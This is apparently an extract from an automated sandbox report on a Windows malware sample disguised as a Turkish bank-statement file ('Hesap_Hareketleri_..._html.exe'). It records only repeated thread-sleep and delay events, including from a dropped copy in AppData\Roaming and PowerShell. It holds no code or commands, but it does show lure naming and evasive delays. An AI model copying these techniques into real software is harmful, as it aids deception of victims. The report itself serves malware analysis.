Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597075s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596967s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596748s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596311s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595611s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595463s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594904s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -594111s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -239890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -239781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -239672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -239547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -239304s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -238641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -238531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -238420s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -238307s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -238202s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -238088s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -237984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7512	Thread sleep time: -237875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7496	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep count: 40 > 30
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -36893488147419080s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7772	Thread sleep count: 3068 > 30
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599890s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7772	Thread sleep count: 6778 > 30
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599640s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599530s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599416s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599312s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599203s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -599093s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598984s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598874s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598765s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598644s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598525s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598421s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598251s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -598079s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597968s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597859s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597750s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597640s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597531s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597421s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597312s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597203s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -597092s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596984s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596872s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596765s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596656s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596547s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596437s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596328s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596217s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596109s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -596000s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -595887s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -595781s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -595601s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -595473s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -595342s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -595062s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594953s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594843s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594734s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594625s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594515s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594406s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594293s >= -30000s
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe TID: 7768	Thread sleep time: -594187s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239704	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239529	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239340	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239080	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238954	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238840	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238735	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238589	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238484	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238375	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238266	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238156	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238047	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237938	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237813	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237688	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237578	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237466	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237360	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237250	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237141	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237030	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236916	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236812	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236704	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236594	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236469	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236047	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235719	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235500	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235355	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235210	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235068	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 234922	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599666	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599324	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598655	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598318	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597200	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596967	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596748	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596311	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595611	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595463	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594904	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594111	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239304	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238420	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238307	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238088	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 237984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 237875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599530
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599416
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598644
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598525
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598251
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598079
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597092
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596872
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596217
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595887
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595601
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595473
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595342
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594953
